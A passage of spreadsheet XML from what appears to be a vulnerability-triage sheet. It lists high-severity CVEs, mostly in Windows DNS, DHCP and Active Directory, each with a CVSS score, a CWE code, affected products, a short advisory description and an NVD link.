t="inlineStr"><is><t>New</t></is></c><c r="C332" s="5" t="inlineStr"><is><t>CVE-2026-69510</t></is></c><c r="D332" s="5" t="n"><v>8.1</v></c><c r="E332" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F332" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G332" s="5" t="inlineStr" /><c r="H332" s="5" t="n"><v>0.007</v></c><c r="I332" s="5" t="inlineStr" /><c r="J332" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K332" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L332" s="5" t="inlineStr" /><c r="M332" s="5" t="inlineStr" /><c r="N332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P332" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q332" s="5" t="inlineStr" /><c r="R332" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S332" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t></is></c></row><row r="333"><c r="A333" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C333" s="5" t="inlineStr"><is><t>CVE-2026-69524</t></is></c><c r="D333" s="5" t="n"><v>8.1</v></c><c r="E333" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F333" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G333" s="5" t="inlineStr" /><c r="H333" s="5" t="n"><v>0.007</v></c><c r="I333" s="5" t="inlineStr" /><c r="J333" s="5" t="inlineStr" /><c r="K333" s="5" t="inlineStr" /><c r="L333" s="5" t="inlineStr" /><c r="M333" s="5" t="inlineStr" /><c r="N333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P333" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q333" s="5" t="inlineStr" /><c r="R333" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S333" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t></is></c></row><row r="334"><c r="A334" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C334" s="5" t="inlineStr"><is><t>CVE-2026-69530</t></is></c><c r="D334" s="5" t="n"><v>8.1</v></c><c r="E334" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F334" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G334" s="5" t="inlineStr" /><c r="H334" s="5" t="n"><v>0.006</v></c><c r="I334" s="5" t="inlineStr" /><c r="J334" s="5" t="inlineStr" /><c r="K334" s="5" t="inlineStr" /><c r="L334" s="5" t="inlineStr" /><c r="M334" s="5" t="inlineStr" /><c r="N334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P334" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q334" s="5" t="inlineStr" /><c r="R334" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S334" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t></is></c></row><row r="335"><c r="A335" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C335" s="5" t="inlineStr"><is><t>CVE-2026-69546</t></is></c><c r="D335" s="5" t="n"><v>8.1</v></c><c r="E335" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F335" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G335" s="5" t="inlineStr" /><c r="H335" s="5" t="n"><v>0.007</v></c><c r="I335" s="5" t="inlineStr" /><c r="J335" s="5" t="inlineStr" /><c r="K335" s="5" t="inlineStr" /><c r="L335" s="5" t="inlineStr" /><c r="M335" s="5" t="inlineStr" /><c r="N335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P335" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q335" s="5" t="inlineStr" /><c r="R335" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S335" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t></is></c></row><row r="336"><c r="A336" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C336" s="5" t="inlineStr"><is><t>CVE-2026-69620</t></is></c><c r="D336" s="5" t="n"><v>8.1</v></c><c r="E336" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F336" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G336" s="5" t="inlineStr" /><c r="H336" s="5" t="n"><v>0.007</v></c><c r="I336" s="5" t="inlineStr" /><c r="J336" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K336" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L336" s="5" t="inlineStr" /><c r="M336" s="5" t="inlineStr" /><c r="N336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P336" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q336" s="5" t="inlineStr" /><c r="R336" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S336" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t></is></c></row><row r="337"><c r="A337" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C337" s="5" t="inlineStr"><is><t>CVE-2026-69680</t></is></c><c r="D337" s="5" t="n"><v>8.1</v></c><c r="E337" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F337" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G337" s="5" t="inlineStr" /><c r="H337" s="5" t="n"><v>0.003</v></c><c r="I337" s="5" t="inlineStr" /><c r="J337" s="5" t="inlineStr" /><c r="K337" s="5" t="inlineStr" /><c r="L337" s="5" t="inlineStr" /><c r="M337" s="5" t="inlineStr" /><c r="N337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P337" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q337" s="5" t="inlineStr" /><c r="R337" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S337" s="5" t="inlineStr"><is><t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t></is></c></row><row r="338"><c r="A338" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C338" s="5" t="inlineStr"><is><t>CVE-2026-69732</t></is></c><c r="D338" s="5" t="n"><v>8.1</v></c><c r="E338" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F338" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G338" s="5" t="inlineStr" /><c r="H338" s="5" t="n"><v>0.007</v></c><c r="I338" s="5" t="inlineStr" /><c r="J338" s="5" t="inlineStr" /><c r="K338" s="5" t="inlineStr" /><c r="L338" s="5" t="inlineStr" /><c r="M338" s="5" t="inlineStr" /><c r="N338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P338" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q338" s="5" t="inlineStr" /><c r="R338" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S338" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t></is></c></row><row r="339"><c r="A339" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C339" s="5" t="inlineStr"><is><t>CVE-2026-69782</t></is></c><c r="D339" s="5" t="n"><v>8.1</v></c><c r="E339" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F339" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G339" s="5" t="inlineStr" /><c r="H339" s="5" t="n"><v>0.006</v></c><c r="I339" s="5" t="inlineStr" /><c r="J339" s="5" t="inlineStr" /><c r="K339" s="5" t="inlineStr" /><c r="L339" s="5" t="inlineStr" /><c r="M339" s="5" t="inlineStr" /><c r="N339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P339" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q339" s="5" t="inlineStr" /><c r="R339" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S339" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t></is></c></row><row r="340"><c r="A340" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C340" s="5" t="inlineStr"><is><t>CVE-2026-69786</t></is></c><c r="D340" s="5" t="n"><v>8.1</v></c><c r="E340" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F340" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G340" s="5" t="inlineStr" /><c r="H340" s="5" t="n"><v>0.007</v></c><c r="I340" s="5" t="inlineStr" /><c r="J340" s="5" t="inlineStr" /><c r="K340" s="5" t="inlineStr" /><c r="L340" s="5" t="inlineStr" /><c r="M340" s="5" t="inlineStr" /><c r="N340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P340" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q340" s="5" t="inlineStr" /><c r="R340" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S340" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t></is></c></row><row r="341"><c r="A341" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C341" s="5" t="inlineStr"><is><t>CVE-2026-69813</t></is></c><c r="D341" s="5" t="n"><v>8.1</v></c><c r="E341" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F341" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G341" s="5" t="inlineStr" /><c r="H341" s="5" t="n"><v>0.007</v></c><c r="I341" s="5" t="inlineStr" /><c r="J341" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K341" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L341" s="5" t="inlineStr" /><c r="M341" s="5" t="inlineStr" /><c r="N341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P341" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q341" s="5" t="inlineStr" /><c r="R341" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S341" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t></is></c></row><row r="342"><c r="A342" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C342" s="5" t="inlineStr"><is><t>CVE-2026-69827</t></is></c><c r="D342" s="5" t="n"><v>8.1</v></c><c r="E342" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F342" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G342" s="5" t="inlineStr" /><c r="H342" s="5" t="n"><v>0.005</v></c><c r="I342" s="5" t="inlineStr" /><c r="J342" s="5" t="inlineStr" /><c r="K342" s="5" t="inlineStr" /><c r="L342" s="5" t="inlineStr" /><c r="M342" s="5" t="inlineStr" /><c r="N342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q342" s="5" t="inlineStr" /><c r="R342" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S342" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t></is></c></row><row r="343"><c r="A343" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C343" s="5" t="inlineStr"><is><t>CVE-2026-69858</t></is></c><c r="D343" s="5" t="n"><v>8.1</v></c><c r="E343" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F343" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G343" s="5" t="inlineStr" /><c r="H343" s="5" t="n"><v>0.007</v></c><c r="I343" s="5" t="inlineStr" /><c r="J343" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K343" s="5" t="inlineStr"><is><t>microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L343" s="5" t="inlineStr" /><c r="M343" s="5" t="inlineStr" /><c r="N343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P343" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q343" s="5" t="inlineStr" /><c r="R343" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S343" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t></is></c></row><row r="344"><c r="A344" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C344" s="5" t="inlineStr"><is><t>CVE-2026-69989</t></is></c><c r="D344" s="5" t="n"><v>8.1</v></c><c r="E344" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F344" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G344" s="5" t="inlineStr" /><c r="H344" s="5" t="n"><v>0.007</v></c><c r="I344" s="5" t="inlineStr" /><c r="J344" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K344" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L344" s="5" t="inlineStr" /><c r="M344" s="5" t="inlineStr" /><c r="N344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P344" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q344" s="5" t="inlineStr" /><c r="R344" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S344" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t></is></c></row><row r="345"><c r="A345" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C345" s="5" t="inlineStr"><is><t>CVE-2026-70342</t></is></c><c r="D345" s="5" t="n"><v>8.1</v></c><c r="E345" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F345" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G345" s="5" t="inlineStr" /><c r="H345" s="5" t="n"><v>0.008999999999999999</v></c><c r="I345" s="5" t="inlineStr" /><c r="J345" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K34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45" s="5" t="inlineStr" /><c r="M345" s="5" t="inlineStr" /><c r="N345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P345" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q345" s="5" t="inlineStr" /><c r="R345" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S345" s="5" t="inlineStr"><is><t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t></is></c></row><row r="346"><c r="A346" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C346" s="5" t="inlineStr"><is><t>CVE-2026-70563</t></is></c><c r="D346" s="5" t="n"><v>8.1</v></c><c r="E346" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F346" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G346" s="5" t="inlineStr" /><c r="H346" s="5" t="n"><v>0.008999999999999999</v></c><c r="I346" s="5" t="inlineStr" /><c r="J346" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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46" s="5" t="inlineStr" /><c r="M346" s="5" t="inlineStr" /><c r="N346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P346" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q346" s="5" t="inlineStr" /><c r="R346" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S346" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t></is></c></row><row r="347"><c r="A347" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C347" s="5" t="inlineStr"><is><t>CVE-2026-72936</t></is></c><c r="D347" s="5" t="n"><v>8.1</v></c><c r="E347" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F347" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G347" s="5" t="inlineStr" /><c r="H347" s="5" t="n"><v>0.006</v></c><c r="I347" s="5" t="inlineStr" /><c r="J347" s="5" t="inlineStr" /><c r="K347" s="5" t="inlineStr" /><c r="L347" s="5" t="inlineStr" /><c r="M347" s="5" t="inlineStr" /><c r="N347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P347" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q347" s="5" t="inlineStr" /><c r="R347" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S347" s="5" t="inlineStr"><is><t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t></is></c></row><row r="348"><c r="A348" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C348" s="5" t="inlineStr"><is><t>CVE-2026-72981</t></is></c><c r="D348" s="5" t="n"><v>8.1</v></c><c r="E348" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F348" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G348" s="5" t="inlineStr" /><c r="H348" s="5" t="n"><v>0.005</v></c><c r="I348" s="5" t="inlineStr" /><c r="J348" s="5" t="inlineStr" /><c r="K348" s="5" t="inlineStr" /><c r="L348" s="5" t="inlineStr" /><c r="M348" s="5" t="inlineStr" /><c r="N348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P348" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q348" s="5" t="inlineStr" /><c r="R348" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S348" s="5" t="inlineStr"><is><t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t></is></c></row><row r="349"><c r="A349" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C349" s="5" t="inlineStr"><is><t>CVE-2026-72987</t></is></c><c r="D349" s="5" t="n"><v>8.1</v></c><c r="E349" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F349" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G349" s="5" t="inlineStr" /><c r="H349" s="5" t="n"><v>0.006</v></c><c r="I349" s="5" t="inlineStr" /><c r="J349" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K349" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L349" s="5" t="inlineStr" /><c r="M349" s="5" t="inlineStr" /><c r="N349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P349" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q349" s="5" t="inlineStr" /><c r="R349" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S349" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t></is></c></row><row r="350"><c r="A350" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C350" s="5" t="inlineStr"><is><t>CVE-2026-73313</t></is></c><c r="D350" s="5" t="n"><v>8.1</v></c><c r="E350" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G350" s="5" t="inlineStr" /><c r="H350" s="5" t="n"><v>0.004</v></c><c r="I350" s="5" t="inlineStr" /><c r="J350" s="5" t="inlineStr" /><c r="K350" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L350" s="5" t="inlineStr" /><c r="M350" s="5" t="inlineStr" /><c r="N350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P350" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q350" s="5" t="inlineStr" /><c r="R350" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S350" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a multi-factor authentication bypass vulnerability in the passkey TFA provider that allows an authenticated attacker to complete login as another user by submitting their own registered passkey credential during the WebAuthn assertion step. The passkey verification path performs a global credential lookup without validating that the matched credential belongs to the user whose login is pending, enabling an attacker who knows a target account's password to sign the challenge with their own passkey and bypass multi-factor authentication on both public forum and ACP login paths.</t></is></c><c r="T350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t></is></c></row><row r="351"><c r="A351" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C351" s="5" t="inlineStr"><is><t>CVE-2026-75021</t></is></c><c r="D351" s="5" t="n"><v>8.1</v></c><c r="E351" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F351" s="5" t="inlineStr"><is><t>ce714d77-add3-4f53-aff5-83d477b104bb</t></is></c><c r="G351" s="5" t="inlineStr" /><c r="H351" s="5" t="n"><v>0.004</v></c><c r="I351" s="5" t="inlineStr" /><c r="J351" s="5" t="inlineStr" /><c r="K351" s="5" t="inlineStr" /><c r="L351" s="5" t="inlineStr" /><c r="M351" s="5" t="inlineStr" /><c r="N351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q351" s="5" t="inlineStr" /><c r="R351" s="5" t="inlineStr"><is><t>CWE-1327</t></is></c><c r="S351" s="5" t="inlineStr"><is><t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t></is></c><c r="T351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t></is></c></row><row r="352"><c r="A352" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C352" s="5" t="inlineStr"><is><t>CVE-2026-77505</t></is></c><c r="D352" s="5" t="n"><v>8.1</v></c><c r="E352" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F352" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G352" s="5" t="inlineStr" /><c r="H352" s="5" t="n"><v>0.005</v></c><c r="I352" s="5" t="inlineStr" /><c r="J352" s="5" t="inlineStr" /><c r="K352" s="5" t="inlineStr" /><c r="L352" s="5" t="inlineStr" /><c r="M352" s="5" t="inlineStr" /><c r="N352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P352" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q352" s="5" t="inlineStr" /><c r="R352" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S352" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t></is></c></row><row r="353"><c r="A353" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C353" s="5" t="inlineStr"><is><t>CVE-2026-78444</t></is></c><c r="D353" s="5" t="n"><v>8.1</v></c><c r="E353" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F353" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G353" s="5" t="inlineStr" /><c r="H353" s="5" t="n"><v>0.005</v></c><c r="I353" s="5" t="inlineStr" /><c r="J353" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K353" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L353" s="5" t="inlineStr" /><c r="M353" s="5" t="inlineStr" /><c r="N353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q353" s="5" t="inlineStr" /><c r="R353" s="5" 